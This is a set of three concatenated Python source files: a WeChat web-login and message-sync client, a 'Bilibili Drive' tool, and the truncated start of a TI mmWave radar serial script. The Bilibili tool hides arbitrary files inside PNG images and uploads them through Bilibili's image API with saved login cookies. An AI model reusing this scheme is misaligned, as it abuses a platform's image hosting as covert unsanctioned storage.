self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
main.py
|
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
import hashlib
import json
import math
import os
import re
import requests
import shlex
import signal
import struct
import sys
import threading
import time
import types
from PIL import Image
from io import BytesIO
from bilibili import Bilibili
#from picture import Encoder
bundle_dir = os.path.dirname(sys.executable) if getattr(sys, "frozen", False) else os.path.dirname(os.path.abspath(__file__))
default_url = lambda sha1: f"http://i0.hdslb.com/bfs/album/{sha1}.png"
meta_string = lambda url: ("bd:pg:" + re.findall(r"[a-fA-F0-9]{40}", url)[0]) if re.match(r"^http(s?)://i0.hdslb.com/bfs/album/[a-fA-F0-9]{40}.png$", url) else url
size_string = lambda byte: f"{byte / 1024 / 1024 / 1024:.2f} GB" if byte > 1024 * 1024 * 1024 else f"{byte / 1024 / 1024:.2f} MB" if byte > 1024 * 1024 else f"{byte / 1024:.2f} KB" if byte > 1024 else f"{int(byte)} B"
def log(message):
print(f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}] {message}")
def encode_png(data):
minw = 2048
minh = 1080
dep = 3
mode = 'RGB'
data = struct.pack('<I', len(data)) + data
minsz = minw * minh * dep
if len(data) < minsz:
data = data + b'\0' * (minsz - len(data))
rem = len(data) % (minw * dep)
if rem != 0:
data = data + b'\0' * (minw * dep - rem)
hei = len(data) // (minw * dep)
img = Image.frombytes(mode, (minw, hei), data)
bio = BytesIO()
img.save(bio, 'png')
return bio.getvalue()
def calc_sha1(data, hexdigest=False):
sha1 = hashlib.sha1()
if isinstance(data, types.GeneratorType):
for chunk in data:
sha1.update(chunk)
else:
sha1.update(data)
return sha1.hexdigest() if hexdigest else sha1.digest()
def read_in_chunk(file_name, chunk_size=16 * 1024 * 1024, chunk_number=-1):
chunk_counter = 0
with open(file_name, "rb") as f:
while True:
data = f.read(chunk_size)
if data != b"" and (chunk_number == -1 or chunk_counter < chunk_number):
yield data
chunk_counter += 1
else:
return
def read_history(dirs,file):
try:
with open(os.path.join(dirs, file), "r", encoding="utf-8") as f:
history = json.loads(f.read())
except:
history = {}
return history
def get_file(root_path, all_files=[]):
files = os.listdir(root_path)
for file in files:
if not os.path.isdir(root_path + '\\' + file): # not a dir
all_files.append(root_path + '\\' + file)
else: # is a dir
get_file((root_path + '\\' + file), all_files)
return all_files
def login():
bilibili = Bilibili()
username = input("username > ")
password = input("password > ")
if bilibili.login(username, password):
bilibili.get_user_info()
with open(os.path.join(bundle_dir, "cookies.json"), "w", encoding="utf-8") as f:
f.write(json.dumps(bilibili.get_cookies(), ensure_ascii=False, indent=2))
def image_upload(data, cookies):
url = "https://api.vc.bilibili.com/api/v1/drawImage/upload"
headers = {
'Origin': "https://t.bilibili.com",
'Referer': "https://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
files = {
'file_up': (f"{int(time.time() * 1000)}.png", data),
}
data = {
'biz': "draw",
'category': "daily",
}
try:
response = requests.post(url, data=data, headers=headers, cookies=cookies, files=files, timeout=300).json()
except:
response = None
return response
def upload(file_name, thread, block_size,folder,write):
def core(index, block):
try:
block_sha1 = calc_sha1(block, hexdigest=True)
full_block = encode_png(block)
full_block_sha1 = calc_sha1(full_block, hexdigest=True)
url = is_skippable(full_block_sha1)
if url:
log(f"分块{index + 1}/{block_num}上传完毕")
block_dict[index] = {
'url': url,
'size': len(block),
'sha1': block_sha1,
}
else:
# log(f"分块{index + 1}/{block_num}开始上传")
for _ in range(10):
if terminate_flag.is_set():
return
response = image_upload(full_block, cookies)
if response:
if response['code'] == 0:
url = response['data']['image_url']
log(f"分块{index + 1}/{block_num}上传完毕")
block_dict[index] = {
'url': url,
'size': len(block),
'sha1': block_sha1,
}
return
elif response['code'] == -4:
terminate_flag.set()
log(f"分块{index + 1}/{block_num}第{_ + 1}次上传失败, 请重新登录")
return
log(f"分块{index + 1}/{block_num}第{_ + 1}次上传失败")
else:
terminate_flag.set()
except:
terminate_flag.set()
finally:
done_flag.release()
def is_skippable(sha1):
url = default_url(sha1)
headers = {
'Referer': "http://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
for _ in range(5):
try:
response = requests.head(url, headers=headers, timeout=13)
return url if response.status_code == 200 else None
except:
pass
return None
def write_history(first_4mb_sha1, meta_dict, url,write):
history = read_history(bundle_dir,write)
history[first_4mb_sha1] = meta_dict
history[first_4mb_sha1]['url'] = url
dirs = os.path.dirname(file_name) if write[-7:]==".bdsync" else bundle_dir
with open(os.path.join(dirs, write), "w", encoding="utf-8") as f:
f.write(json.dumps(history, ensure_ascii=False, indent=2))
start_time = time.time()
if not os.path.exists(file_name):
log(f"文件{file_name}不存在")
return None
if os.path.isdir(file_name):
log("上传文件夹请至uploadall")
return None
log(f"上传: {os.path.basename(file_name)} ({size_string(os.path.getsize(file_name))})")
if os.path.getsize(file_name)<=80*1024*1024: #80MB
if block_size==0 : block_size=4
if thread==0 : thread=8
if os.path.getsize(file_name)>80*1024*1024 and os.path.getsize(file_name)<=500*1024*1024: #500MB
if block_size==0 : block_size=8
if thread==0 : thread=8
if os.path.getsize(file_name)>500*1024*1024:
if block_size==0 : block_size=16
if thread==0 : thread=8
first_4mb_sha1 = calc_sha1(read_in_chunk(file_name, chunk_size=4 * 1024 * 1024, chunk_number=1), hexdigest=True)
history = read_history(bundle_dir,"history.json") if write[-7:]!=".bdsync" else read_history(os.path.dirname(file_name),write)
if first_4mb_sha1 in history:
url = history[first_4mb_sha1]['url']
log(f"文件已于{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(history[first_4mb_sha1]['time']))}上传, 共有{len(history[first_4mb_sha1]['block'])}个分块")
log(f"META URL -> {meta_string(url)}")
return url
try:
with open(os.path.join(bundle_dir, "cookies.json"), "r", encoding="utf-8") as f:
cookies = json.loads(f.read())
except:
log("Cookies加载失败, 请先登录")
return None
log(f"线程数: {thread}")
done_flag = threading.Semaphore(0)
terminate_flag = threading.Event()
thread_pool = []
block_dict = {}
block_num = math.ceil(os.path.getsize(file_name) / (block_size * 1024 * 1024))
log(f"分块大小: {block_size} MB")
log(f"分块数: {block_num}")
for index, block in enumerate(read_in_chunk(file_name, chunk_size=block_size * 1024 * 1024)):
if len(thread_pool) >= thread:
done_flag.acquire()
if not terminate_flag.is_set():
thread_pool.append(threading.Thread(target=core, args=(index, block)))
thread_pool[-1].start()
else:
log("已终止上传, 等待线程回收")
break
for thread in thread_pool:
thread.join()
if terminate_flag.is_set():
return None
sha1 = calc_sha1(read_in_chunk(file_name), hexdigest=True)
fn = os.path.abspath(file_name) if folder else os.path.basename(file_name)
meta_dict = {
'time': int(time.time()),
'filename': fn,
'size': os.path.getsize(file_name),
'sha1': sha1,
'block': [block_dict[i] for i in range(len(block_dict))],
}
meta = json.dumps(meta_dict, ensure_ascii=False).encode("utf-8")
full_meta = encode_png(meta)
for _ in range(10):
response = image_upload(full_meta, cookies)
if response and response['code'] == 0:
url = response['data']['image_url']
log("元数据上传完毕")
log(f"{meta_dict['filename']} ({size_string(meta_dict['size'])}) 上传完毕, 用时{time.time() - start_time:.1f}秒, 平均速度{size_string(meta_dict['size'] / (time.time() - start_time))}/s")
log(f"META URL -> {meta_string(url)}")
write_history(first_4mb_sha1, meta_dict, url,write)
return url
log(f"元数据第{_ + 1}次上传失败")
else:
return None
def decode_png(data):
img = Image.open(BytesIO(data))
data = img.tobytes()
sz = struct.unpack('<I', data[:4])[0]
data = data[4:4+sz]
return data
def image_download(url):
headers = {
'Referer': "http://t.bilibili.com/",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36",
}
content = []
last_chunk_time = None
try:
for chunk in requests.get(url, headers=headers, timeout=10, stream=True).iter_content(128 * 1024):
if last_chunk_time is not None and time.time() - last_chunk_time > 5:
return None
content.append(chunk)
last_chunk_time = time.time()
return b"".join(content)
except:
return None
def fetch_meta(string):
try:
sha1 = re.search(r"[a-fA-F0-9]{40}", string)
full_meta = image_download(f"http://i0.hdslb.com/bfs/album/{sha1.group(0)}.png")
meta_dict = json.loads(decode_png(full_meta).decode("utf-8"))
return meta_dict
except:
return None
def download(meta, file, thread, folder):
def core(index, block_dict):
try:
# log(f"分块{index + 1}/{len(meta_dict['block'])}开始下载")
for _ in range(10):
if terminate_flag.is_set():
return
block = image_download(block_dict['url'])
if block:
block = decode_png(block)
if calc_sha1(block, hexdigest=True) == block_dict['sha1']:
file_lock.acquire()
f.seek(block_offset(index))
f.write(block)
file_lock.release()
log(f"分块{index + 1}/{len(meta_dict['block'])}下载完毕")
return
else:
log(f"分块{index + 1}/{len(meta_dict['block'])}校验未通过")
else:
log(f"分块{index + 1}/{len(meta_dict['block'])}第{_ + 1}次下载失败")
else:
terminate_flag.set()
except:
terminate_flag.set()
finally:
done_flag.release()
def block_offset(index):
return sum(meta_dict['block'][i]['size'] for i in range(index))
def is_overwritable(file_name):
return (input("文件已存在, 是否覆盖? [y/N] ") in ["y", "Y"])
start_time = time.time()
meta_dict = fetch_meta(meta)
if meta_dict:
if ('end' in meta_dict):
downloadall("","",meta)
return None
else:
file_name = file if file else meta_dict['filename']
log(f"下载: {os.path.basename(file_name)} ({size_string(meta_dict['size'])}), 共有{len(meta_dict['block'])}个分块, 上传于{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(meta_dict['time']))}")
else:
log("元数据解析失败")
return None
log(f"线程数: {thread}")
download_block_list = []
if os.path.exists(file_name):
if os.path.getsize(file_name) == meta_dict['size'] and calc_sha1(read_in_chunk(file_name), hexdigest=True) == meta_dict['sha1']:
log("文件已存在, 且与服务器端内容一致")
return file_name
elif is_overwritable(file_name):
with open(file_name, "rb") as f:
for index, block_dict in enumerate(meta_dict['block']):
f.seek(block_offset(index))
if calc_sha1(f.read(block_dict['size']), hexdigest=True) == block_dict['sha1']:
# log(f"分块{index + 1}/{len(meta_dict['block'])}校验通过")
pass
else:
# log(f"分块{index + 1}/{len(meta_dict['block'])}校验未通过")
download_block_list.append(index)
log(f"{len(download_block_list)}/{len(meta_dict['block'])}个分块待下载")
else:
return None
else:
download_block_list = list(range(len(meta_dict['block'])))
done_flag = threading.Semaphore(0)
terminate_flag = threading.Event()
file_lock = threading.Lock()
thread_pool = []
if folder :
if os.path.exists(os.path.dirname(file_name))==False : # 还原目录的文件下载
os.makedirs(os.path.dirname(file_name))
with open(file_name, "r+b" if os.path.exists(file_name) else "wb") as f:
for index in download_block_list:
if len(thread_pool) >= thread:
done_flag.acquire()
if not terminate_flag.is_set():
thread_pool.append(threading.Thread(target=core, args=(index, meta_dict['block'][index])))
thread_pool[-1].start()
else:
log("已终止下载, 等待线程回收")
break
for thread in thread_pool:
thread.join()
if terminate_flag.is_set():
return None
f.truncate(sum(block['size'] for block in meta_dict['block']))
log(f"{os.path.basename(file_name)} ({size_string(meta_dict['size'])}) 下载完毕, 用时{time.time() - start_time:.1f}秒, 平均速度{size_string(meta_dict['size'] / (time.time() - start_time))}/s")
sha1 = calc_sha1(read_in_chunk(file_name), hexdigest=True)
if sha1 == meta_dict['sha1']:
log("文件校验通过")
return file_name
else:
log("文件校验未通过")
return None
def uploadall(path):
def write_history(first_4mb_sha1, meta_dict, url, write):
history = read_history(bundle_dir,write)
history[first_4mb_sha1] = meta_dict
if url:
history[first_4mb_sha1]['url'] = url
with open(os.path.join(bundle_dir, write), "w", encoding="utf-8") as f:
f.write(json.dumps(history, ensure_ascii=False, indent=2))
if not os.path.exists(path):
print("目录不存在")
return None
torrent = f"upload-{time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))}.bd"
with open(os.path.join(bundle_dir, torrent), "a", encoding="utf-8") as f:
f.write(json.dumps({}, ensure_ascii=False, indent=2))
index = 0
files_num = len(get_file(path,[]))
for i in get_file(path,[]):
index += 1
log(f"=== 正在上传 {index}/{files_num} {i} ===")
upload(i,0,0,True,torrent)
# 编码数据集上传
try:
with open(os.path.join(bundle_dir, "cookies.json"), "r", encoding="utf-8") as f:
cookies = json.loads(f.read())
except:
log("Cookies加载失败, 请先登录")
return None
end = {
'time': int(time.time()),
'root_path': path,
'files_num': files_num
}
write_history('end',end,"",torrent)
meta = json.dumps(read_history(bundle_dir,torrent), ensure_ascii=False).encode("utf-8")
full_meta = encode_png(meta)
for _ in range(10):
response = image_upload(full_meta, cookies)
if response and response['code'] == 0:
url = response['data']['image_url']
log("所有文件元数据上传完毕")
log(f"META URL -> {meta_string(url)}")
write_history('end',end,url,torrent)
return url
log(f"元数据第{_ + 1}次上传失败")
else:
return None
def downloadall(jsonfile,bdfile,meta):
if jsonfile:
if not os.path.exists(jsonfile):
print('无history.json文件')
return None
else:
if not os.path.exists(bundle_dir + "\\download"):
os.makedirs(bundle_dir + "\\download")
os.chdir(bundle_dir + "\\download")
with open(os.path.join(jsonfile), "r", encoding="utf-8") as f:
history = json.loads(f.read())
num = 0
for i in history :
num += 1
file = history[i]["filename"]
log(f"=== 正在下载 {num}/{len(history)} {file} ===")
download(history[i]["url"],file,8,False)
elif bdfile:
if not os.path.exists(bdfile):
print('无upload.bd文件')
return None
else:
with open(os.path.join(bdfile), "r", encoding="utf-8") as f:
history = json.loads(f.read())
num = 0
for i in history :
num += 1
if i=="end": return None
file = history[i]["filename"]
file = file.replace(os.path.dirname(os.path.dirname(history["end"]["root_path"])),"")
log(f"=== 正在下载 {num}/{len(history)-1} {file} ===")
download(history[i]["url"],file,8,True)
elif meta:
history = fetch_meta(meta)
num = 0
for i in history :
num += 1
if i=="end": return None
file = history[i]["filename"]
file = file.replace(os.path.dirname(os.path.dirname(history["end"]["root_path"])),"")
log(f"=== 正在下载 {num}/{len(history)-1} {file} ===")
download(history[i]["url"],file,8,True)
def basemeta():
meta = input("meta > ")
sha1 = re.search(r"[a-fA-F0-9]{40}", meta)
meta_dict = fetch_meta(meta)
txt = f"{sha1.group(0)}.txt"
with open(os.path.join(bundle_dir, f"{sha1.group(0)}.txt"), "w", encoding="utf-8") as f:
f.write(json.dumps(meta_dict, ensure_ascii=False, indent=2))
print(f"元数据导出到 {sha1.group(0)}.txt ")
def output():
file = input("history_file > ")
if file:
try:
with open(os.path.join(file), "r", encoding="utf-8") as f:
history = json.loads(f.read())
except:
history = {}
else:
history = read_history(bundle_dir,"history.json")
if history:
txt = f"history-{time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))}.txt"
for meta_dict in history:
with open(os.path.join(bundle_dir, txt), "a", encoding="utf-8") as f:
f.write(f"文件名: {history[meta_dict]['filename']}\n")
f.write(f"大小: {size_string(history[meta_dict]['size'])}\n")
f.write(f"SHA-1: {history[meta_dict]['sha1']}\n")
f.write(f"上传时间: {time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(history[meta_dict]['time']))}\n")
f.write(f"分块数: {len(history[meta_dict]['block'])}\n")
f.write(f"分块大小:{size_string(history[meta_dict]['block'][0]['size'])}\n")
f.write(f"META URL -> {meta_string(history[meta_dict]['url'])}\n")
f.write(f"\n")
f.write(f"\n")
print(f"导出完成")
else:
print(f"暂无历史记录")
def syncup(path):
for i in get_file(path,[]):
if i[-7:]!=".bdsync":
log(f"=== 正在上传 {os.path.basename(i)} ===")
upload(i,0,0,False,f"{os.path.basename(i)}.bdsync")
os.system('attrib +h ' + f'"{i}.bdsync"')
def syncdel(path):
for i in get_file(path,[]):
history = read_history(os.path.dirname(i),f"{(os.path.basename(i))}.bdsync")
for j in history:
if history[j]["sha1"] == calc_sha1(read_in_chunk(i), hexdigest=True) :
os.remove(i)
log(f"释放文件 {(os.path.basename(i))}")
else:
log(f"改动的文件 {(os.path.basename(i))}")
def syncdown(path):
for i in get_file(path,[]):
if i[-7:]==".bdsync":
history = read_history(os.path.dirname(i),f"{(os.path.basename(i))}")
for j in history:
os.chdir(os.path.dirname(i))
download(history[j]["url"],"",8,False)
def main():
print("Welcome to Bilibili Drive")
print("软件交流QQ群 ⁹²⁷²⁵⁶⁰⁹⁰")
print()
print("login 登录哔哩哔哩")
print("upload 上传单个文件")
print("download 下载单个文件")
print("uploadall 批量上传文件")
print("downloadall 批量下载文件")
print("info 查看数据信息")
print("output 导出历史记录")
print("syncup 上传同步文件")
print("syncdel 清理同步文件")
print("syncdown 下载同步文件")
while True:
action = input("BiliDrive > ")
if action == "login":
login()
if action == "upload":
file_name = input("filename > ")
thread = input("thread > ")
thread = 0 if thread=="" else int(thread)
block_size = input("block_size(MB) > ")
block_size = 0 if block_size=="" else int(block_size)
upload(file_name,thread,block_size,False,"history.json")
if action == "uploadall":
path = input("folder_path > ")
uploadall(path)
if action == "download":
meta = input("meta > ")
file = input("rename > ")
thread = input("thread > ")
thread = 8 if thread=="" else int(thread)
download(meta, file, thread, False)
if action == "downloadall":
print("history_file,bd_file,meta三选一")
jsonfile = input("history_file > ")
bdfile = input("bd_file > ")
meta = input("meta > ")
downloadall(jsonfile,bdfile,meta)
if action == "info":
basemeta()
if action == "output":
output()
if action == "syncup":
folder = input("folder > ")
syncup(folder)
if action == "syncdel":
folder = input("folder > ")
if (input("原始文件将被删除,确认吗? [y/N] ") in ["y", "Y"]) :
syncdel(folder)
if action == "syncdown":
folder = input("folder > ")
syncdown(folder)
if action == "exit":
exit()
if __name__ == '__main__':
main()
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx',),
'ver': ('03.04.00.03', '03.05.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile'),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': (), # ('plot_detected_objects', 'simple_cfar_clustering'),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'loglin': float('nan'), 'fftcomp': float('nan'), 'rangebias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
